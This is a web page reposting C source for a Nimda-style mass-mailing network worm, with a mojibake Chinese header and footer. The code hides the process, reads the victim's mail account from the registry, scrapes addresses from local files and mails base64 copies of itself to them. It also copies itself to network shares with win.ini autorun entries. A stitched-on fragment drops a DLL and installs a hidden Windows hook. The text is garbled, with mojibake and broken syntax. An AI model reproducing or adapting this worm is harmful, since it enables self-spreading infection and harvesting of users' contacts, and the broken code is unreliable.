Nimda±à³ÌÄÚÄ»

Àà±ð£ºVCÓïÑÔ µã»÷£º0 ÆÀÂÛ£º0 ÍƼö£º

void WINAPI worm()
long w0rm_ThreadCodeList[ 3] = { 
     ( long) L0calThread,
     ( long) Rem0teThread,
     ( long) MailThread
     } ;

 char *StrArray[ 66] = {
     szCopyRight,
     szFakeMsg,
     szSetUp,
     szWNetOpenEnumA,
     szWNetCloseEnum,
     szWNetEnumResourceA,
     szMPR_DLL,
     szWINSOCK_DLL,
     szWSAStartup,
     szinet_addr,
     szgethostbyaddr,
     szgethostbyname,
     szhtons,
     szsocket,
     szconnect,
     szsend,
     szrecv,
     szclosesocket,
     szWSACleanup,
     smtp_str00,
     smtp_str01,
     smtp_str02,
     smtp_str03,
     smtp_str06,
     smtp_str07,
     smtp_str08,
     smtp_str09,
     smtp_str0B,
     smtp_str0C,
     smtp_str0D,
     smtp_str0E,
     smtp_str0F,
     smtp_newline,
     smtp_separator,
     szWindir00,
     szWindir01,
     szWindir02,
     szWindir03,
     szWindir04,
     szWIN_INI,
     szSETUP_EXE,
     szSYSTEM_EXE,
     szADVAPI_DLL,
     szRegOpenKeyExA,
     szRegQueryValueExA,
     szRegCloseKey,
     szAccountManager,
     szDefaultMail,
     szAccounts,
     szSMTPserver,
     szSMTPemail,
     szExt00,
     szExt01,
     szExt02,
     szExt03,
     szExt04,
     szExt05,
     szExt06,
     szOutlook,
     szCuteFtp,
     szInternetExplorer,
     szTelnet,
     szMirc,
     szRegisterServiceProcess,
     szKernel32,
     szTempFile
    } ;

 static HANDLE w0rm_hThreadList[ 3] ;
 DWORD  w0rm_ThreadIDList[ 3] ;
 char  szModule[ MAX_PATH] ;
 char  *Param ;
 int  count ;
 int  min_threads ;
 int  max_threads ;
 BOOL  re_generation ;

 MailDone = FALSE ;

 for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

 GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
 Param = szModule ;

 while( *Param != 0) Param++ ;

 Param -= 5 ;

 if (( *Param == 'P') || ( *Param == 'p'))
 {
  MessageBox( NULL,
    szFakeMsg,
    szSetUp,
    MB_OK | MB_ICONSTOP) ;

  re_generation = FALSE ;
  max_threads = 1 ;
 } 
 else
 {
  if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
  {
   if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
   {
    a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
   }
  }
  
  re_generation = TRUE ;
  max_threads = 3 ;
 }

 min_threads = 0 ;

 do
 {
  for ( count = min_threads ; count < max_threads ; count++ )
  {
   w0rm_hThreadList[ count] = CreateThread( NULL,
         0,
         ( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
         NULL,
         0,
         &w0rm_ThreadIDList[ count]) ;
  }

  for ( count = min_threads ; count < max_threads ; count++ )
  {
   if ( w0rm_hThreadList[ count] != NULL)
   {
    WaitForSingleObject( w0rm_hThreadList[ count], INFINITE) ;
    CloseHandle ( w0rm_hThreadList[ count]) ;
   }
  }

  if ( MailDone)
  {
   GetWindowsDirectoryA( szModule, MAX_PATH) ;
   strcat( szModule, szWIN_INI) ;
   WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
   re_generation = FALSE ;
  }

  min_threads = 1 ;

  if ( re_generation) Sleep( 0x000FFFFF) ;

 } while( re_generation) ;

 return 0 ;
}

long WINAPI MailThread(long lParam)
{
 unsigned int  addr ;
 struct sockaddr_in server ;
 struct hostent  *hp ;
 WSADATA   wsaData ;

 HANDLE   hFile ;
 HANDLE   hMap ;

 char   enc0de_filename[ MAX_PATH] ;
 char   ShortBuff[ 512] ;
 char   szSIGN[ 512] ;
 char   szHELO[ 512] ;

 BOOL   Success ;
 void   *lpFile ;
 
 int    StrCount ;
 int    FileSize ;

 typedef struct
 {
  char *Command ;
  BOOL WaitReply ;
 }
 SMTPstr ;

 SMTPstr SMTPstrings00[ 2] = { szHELO,  TRUE  ,
     szMAIL_FROM, TRUE  } ;

 SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE  ,
     szMAIL_FROM+5, FALSE ,
     smtp_str06, FALSE ,
     smtp_str07, FALSE ,
     smtp_separator, FALSE ,
     smtp_str08, FALSE ,
     smtp_separator, FALSE ,
     smtp_str09, FALSE ,
     szSIGN,  FALSE ,
     smtp_separator, FALSE ,
     smtp_str0B, FALSE } ;

 SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
     smtp_separator, FALSE ,
     smtp_str0D, FALSE ,
     smtp_newline, FALSE ,
     smtp_str0E, TRUE,
     smtp_str0F, FALSE } ;
 WaitC0nnected() ;

 if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
 
 sprintf( szHELO, "%s %s\n", smtp_str00, szSMTPname) ;
 sprintf( szMAIL_FROM, "%s <%s>\n", smtp_str01, szSMTPaddr) ;
 sprintf( szSIGN,"\n:)\n\n----\n%s\n\n--", szSMTPaddr) ;

 if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

 a_WSAStartup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
 a_inet_addr  = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
 a_gethostbyaddr  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
 a_gethostbyname  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
 a_htons   = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
 a_socket  = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
 a_connect  = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
 a_send   = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
 a_recv   = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
 a_closesocket  = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
 a_WSACleanup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

 if ( ( a_WSAStartup == NULL)  ||
   ( a_inet_addr == NULL)  ||
   ( a_gethostbyaddr == NULL) ||
   ( a_gethostbyname == NULL) ||
   ( a_htons == NULL)  ||
   ( a_socket == NULL)  ||
   ( a_connect == NULL)  ||
   ( a_send == NULL)  ||
   ( a_recv == NULL)  ||
   ( a_closesocket == NULL) ||
   ( a_WSACleanup == NULL))
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }
 
 if ( isalpha( ( int) szSMTPserver[ 0]))
 {
  hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
 }
 else 
 {
  addr = a_inet_addr( szSMTPname) ;
  hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
 }

 if ( hp == NULL)
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 memset( &server, 0, sizeof( server)) ;
 memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
 server.sin_family = hp->h_addrtype ;
 server.sin_port = a_htons( 25) ;

 conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

 if ( conn_socket < 0 )
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
 {
  a_closesocket( conn_socket) ; 
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;
 }

 a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
 
 for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
 {
  Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
  if ( !Success) break ;        
 }
 
 if ( Success)
 {
  Found = 0 ;

  GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
  enc0de_filename[ 3] = 0 ;

  FindPe0ple( enc0de_filename) ; 
 
  for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
  {
   Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
   if ( !Success) break ;        
  }

  if ( Success)
  {
   GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
   GetTempPathA( MAX_PATH, enc0de_filename) ;
   strcat( enc0de_filename, szTempFile) ;

   if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
   {
    if ( ( hFile = CreateFileA( enc0de_filename,
        GENERIC_READ,
        FILE_SHARE_READ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL)) != INVALID_HANDLE_VALUE)
    {
     FileSize = GetFileSize( hFile, NULL) ;

     if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
     {
      if ( ( hMap = CreateFileMappingA( hFile,
           NULL,
           PAGE_READONLY | PAGE_WRITECOPY,
           0,
           FileSize,
           NULL)) != NULL)
      {
       if ( ( lpFile = MapViewOfFile( hMap,
           FILE_MAP_READ,
           0,
           0,
           FileSize)) != NULL)
       {  
        base64_encode( lpFile, FileSize) ;

        for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )           
        {
         if ( ( Success = str2socket(  SMTPstrings02[ StrCount].Command,
             SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
        }

        if ( Success) MailDone = TRUE ;

        UnmapViewOfFile( lpFile) ;
       }
       
       CloseHandle( hMap) ;
      }
     }

     CloseHandle( hFile) ;
    }

    DeleteFileA( enc0de_filename) ;
   }
  }
 }

 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;

 return 0 ;
}

//··············································································?

void NetW0rming( LPNETRESOURCE lpnr)
{
 LPNETRESOURCE lpnrLocal ;
 HANDLE  hEnum ;
 int  count ;
 int  cEntries = 0xFFFFFFFF ;
 DWORD  dwResult ;
 DWORD  cbBuffer = 32768 ;

 if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
    RESOURCETYPE_ANY,
    0,
    lpnr,
    &hEnum) != NO_ERROR) return ;
 do
 {
  lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

         dwResult = a_WNetEnumResource( hEnum,
      &cEntries,
      lpnrLocal,
      &cbBuffer) ;
  if ( dwResult == NO_ERROR)
  {
   for ( count = 1 ; count < cEntries ; count++ )
   {
    if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
    {
     NetW0rming( &lpnrLocal[ count]) ;
    }
    else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
    {
     Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
    }
   }
  }
  else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

 } while ( dwResult != ERROR_NO_MORE_ITEMS) ;

 GlobalFree ( ( HGLOBAL) lpnrLocal) ;

 a_WNetCloseEnum( hEnum) ;

 return ;
}

//··············································································?

void Rem0teInfecti0n( char *szPath)
{
 char   *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
 WIN32_FIND_DATAA FindData ;
 HANDLE   hFind ;
 char   szLookUp[ MAX_PATH] ;
 char   w0rm0rg[ MAX_PATH] ;
 char   w0rmD3st[ MAX_PATH] ;
 int   aux ;

 for ( aux = 0 ; aux < 5 ; aux++ )
 {
  sprintf ( szLookUp, "%s\\%s%s", szPath, dir_name[ aux], szWIN_INI) ;
  if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
  {   
   sprintf( w0rmD3st, "%s\\%s\\%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
   
   if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
   {
    if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
    {
     WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
     FindClose ( hFind) ;
     break ;
    }
   }

   FindClose ( hFind) ;
  }
 }
}

//··············································································?

BOOL str2socket( char *msg, BOOL do_recv)

 int retval ;
 char Buffer[ 256];

/* Code used to debug the worm

 if ( do_recv)
 {
  if ( MessageBox( NULL,
     msg,
     "send() this string ?",
     MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
 }
*/

 if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
 {
  a_WSACleanup() ;
  return FALSE ;
 } 

 if ( do_recv)
 {
  retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
  if ( ( retval == SOCKET_ERROR) || ( retval == 0))
  {   
   a_closesocket( conn_socket) ;
   a_WSACleanup() ;
   return FALSE ;
  }

  Buffer[ retval] = 0 ;

/* Code used to debug the worm

  MessageBox( NULL,
    Buffer,
    "recv()",
    MB_OK | MB_ICONSTOP) ;
*/
 }

 return TRUE ;

//··············································································?

BOOL GetSMTP( char *dest, char *org_email)
{
 char szKeyName[ MAX_PATH] ;
 char szRes[ MAX_PATH] ;
 char *move2low ;
 int size ;
 HKEY hKey ;

 if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
 
 a_RegOpenKeyExA  = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
 a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
 a_RegCloseKey  = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

 if ( ( a_RegOpenKeyExA == NULL)  ||
             ( a_RegQueryValueExA == NULL) ||
      ( a_RegCloseKey == NULL))
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 strcpy( szKeyName, szAccountManager) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }
  
 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szDefaultMail,
     0,
     NULL,
     szRes,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 a_RegCloseKey( hKey) ;

 strcat( szKeyName, szAccounts) ;
 strcat( szKeyName, szRes) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPserver,
     0,
     NULL,
     dest,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPemail,
     0,
     NULL,
     org_email,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 a_RegCloseKey( hKey) ;

 move2low = org_email ;

 while( *move2low != 0)
 {
  if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
  move2low++ ;
 }

 FreeLibrary( hADVAPI) ;
 return TRUE ;
}

//··············································································?

void base64_encode(const void *buf, int size)
{
 char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

 char  ok_base64[ 80] ;
 char  *p = ok_base64 ;
 unsigned char *q = ( unsigned char *) buf ;
 int  i ;
 int  c ;
 int  l ;
 BOOL  SendRes ;
 
 i = l = 0 ;

 while( i < size)
 {
  c = q[ i++] ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
  
  i++ ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
   
  i++ ;
   
  p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
  p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
  p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
  p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
   
  if( i > size) p[ 3] = '=' ;
   
  if( i > size + 1) p[ 2] = '=' ;
   
  p += 4 ;
  
  l += 1 ;

  if ( l == 0x013)
  {
   ok_base64[ 0x04C] = 0x0A ;
   ok_base64[ 0x04D] = 0 ;

   if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

   p = ok_base64 ;
   l = 0;
  }
 }

 if ( SendRes != FALSE)
 {
  if ( l != 0)
  {
   ok_base64[ l*4] = 0x0A ;
   ok_base64[ l*4] = 0 ;

   str2socket( ok_base64, FALSE) ;  
  }
 }
}

//··············································································?

char *DecryptStr( char *DcrStr)
{
 char *pos = DcrStr ;

 while( *pos != 0)
 {
  *pos ^= ( char) 0x0FF ;
  pos++ ;
 }
 
 return DcrStr ;
}

//··············································································?

void FindPe0ple( char *szPath)
{
 char    szRecursive[ MAX_PATH] ;
 char    szCurrentDir[ MAX_PATH] ;
 char    FileExt[ MAX_PATH] ;
 char    RCPT_TO[ MAX_PATH] ;
 WIN32_FIND_DATAA  FindData ;
 HANDLE    hFind ;
 HANDLE    hFile ;
 HANDLE    hMap ;
 void    *lpFile ;
 char    *lpc01 ;
 char    *lpc02 ;
 char    *lpc03 ;
 char    *lpc04 ;
 char    auxchar ;
 int    l00king ;
 int    addrssize ;

 GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
 
 if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

 hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
 if ( hFind != INVALID_HANDLE_VALUE)
 {
  do
  {
   if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
   {
    strcpy (szRecursive,szPath) ;
    strcat (szRecursive,FindData.cFileName) ;
    strcat (szRecursive,"\\") ;
    
    FindPe0ple( szRecursive) ;
   }
   else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.')))   
   {
    lpc01 = FindData.cFileName ;
    lpc02 = NULL ;
     
    while ( *lpc01 != 0)
    {
     if ( *lpc01 == 46) lpc02 = lpc01 ;
     lpc01++ ;
    }
    
    lpc01 = FileExt ;

    if ( lpc02 != NULL)
    {
     while ( *lpc02 != 0)
     {
      if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
      else *lpc01 = *lpc02 ;
       
      lpc01++ ;
      lpc02++ ;
     }

     FileExt[ 4] = 0 ;

     if  ( ( strcmp( FileExt, szExt00) == 0) ||
       ( strcmp( FileExt, szExt01) == 0) ||
       ( strcmp( FileExt, szExt02) == 0) ||
       ( strcmp( FileExt, szExt03) == 0) ||
       ( strcmp( FileExt, szExt04) == 0) ||
       ( strcmp( FileExt, szExt05) == 0) ||
       ( strcmp( FileExt, szExt06) == 0))
     {
      if ( ( hFile = CreateFileA( FindData.cFileName,
          GENERIC_READ,
          0,
          NULL,
          OPEN_EXISTING,
          FILE_ATTRIBUTE_NORMAL,
          NULL)) != INVALID_HANDLE_VALUE)
      {
       if ( ( hMap = CreateFileMappingA( hFile,
            NULL,
            PAGE_READONLY,
            0,
            FindData.nFileSizeLow,
            NULL)) != NULL)
       {
        if ( ( lpFile = MapViewOfFile( hMap,
            FILE_MAP_READ,
            0,
            0,
            FindData.nFileSizeLow)) != NULL)
        {
         lpc01  = lpFile ;
         addrssize = FindData.nFileSizeLow ;
         l00king  = 0 ;
 
         while( ( addrssize > 16) && ( Found < 16))
         {
          if ( *lpc01 == 60)
          {
           l00king = 1 ;
           lpc02 = lpc01 ;
          }

          if ( ( *lpc01 == 64) && ( l00king == 1))
          {
           l00king = 2 ;
          }

          if ( ( *lpc01 == 62) && ( l00king == 2))
          {          
           lpc03 = szSMTPaddr ;
           lpc04 = lpc02 + 1 ;

           while ( *lpc03 != 0)
           {
            auxchar = *lpc04 ;

            if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

            if ( *lpc03 != auxchar)
            {
             l00king = 0 ;
             break ;
            }

            lpc03++ ;
            lpc04++ ;
           }

           if ( l00king == 0)
           {
            strcpy( RCPT_TO, smtp_str02) ;
            lpc03 = RCPT_TO + 9 ;
            while ( *lpc02 != 62)
            {
             *lpc03 = *lpc02 ;
             lpc02++ ;
             lpc03++ ;
            }
            *lpc03 = 62 ;
            lpc03++ ;            
            *lpc03 = 0 ;
            
            strcat( RCPT_TO, "\n") ;

            str2socket( RCPT_TO, TRUE) ;

            Found++ ;
           }
           else l00king = 0 ;
          }

          if ( ( *lpc01 < 64) &&
            ( *lpc01 != 46) &&
            ( *lpc01 != 60) &&
            ( *lpc01 != 62))
          {
           l00king = 0 ;
          }

          if ( *lpc01 > 122)
          {
           l00king = 0 ;
          }
 
          lpc01++ ;
          addrssize-- ;
         }
         
         UnmapViewOfFile( lpFile) ;                      
        }

        CloseHandle( hMap) ;
       }
        
       CloseHandle( hFile) ;
      }
     }
    }
   }
  }  
  while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

  FindClose( hFind) ;
 }

 return ;
}

//··············································································?

void WaitC0nnected( void)
{
 InetActivated = FALSE ;

 while ( !InetActivated)
 {
  EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

  Sleep( 0x01770) ;
 }

 return ;
}

//··············································································?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

 int  CaptionLen ;
 int  AwareLen ;
 int  CompareLen ;
 int  InetAware ;
 int  EquChar ;
 int  aux0 ;
 int  aux1 ;
 char  *Foll0w ;
 char  *PtrAware ;
 char  WindowCaption[ 1024] ;

 CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

 if ( CaptionLen > 0)
 {
  Foll0w = WindowCaption ;

  while( *Foll0w != 0)
  {
   if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
   Foll0w++ ;
  }

  for( InetAware = 0 ; InetAware < 5 ; InetAware++)
  {
   AwareLen = strlen( szAware[ InetAware]) ;
   
   if ( AwareLen < CaptionLen)
   {
    CompareLen = CaptionLen - AwareLen ;   

    for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
    {
     EquChar = 0 ;
     Foll0w = &WindowCaption[ aux0] ;
     PtrAware = szAware[ InetAware] ;

     for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
     {
      if ( *Foll0w == *PtrAware) EquChar++ ;
     }

     if ( EquChar == AwareLen)
     {
      InetActivated = TRUE ;
      break ;
     }

     aux0++ ;
    }
   }
  }
 }

 return ( !InetActivated) ;
}
 void TFTP32()
{
  HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  if(hFile==INVALID_HANDLE_VALUE)
  {
   //printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
   return -1
  }
  //дÎļþÄÚÈÝ
                DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
  while(dwSize>dwIndex)
  {
   if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
   {
    //printf("\nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
    return -1
   }
   dwIndex+=dwWrite;
  }
  //¹Ø±ÕÎļþ¾ä±ú
  CloseHandle(hFile);


hhook hk
STARTUPINFO si;
    PROCESS_INFORMATION pi;
    
    memset(&si,0,sizeof(si));
    si.hStdError = si.hStdOutput = wp1;
    si.hStdInput = rp2;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.lpReserved=0;
    si.lpReserved2=0;
    si.cbReserved2 =0;
    si.cb = sizeof(si);
    //this two must not exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
 hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}

±¾ÎĵØÖ·£ºhttp://com.8s8s.com/it/it2753.htm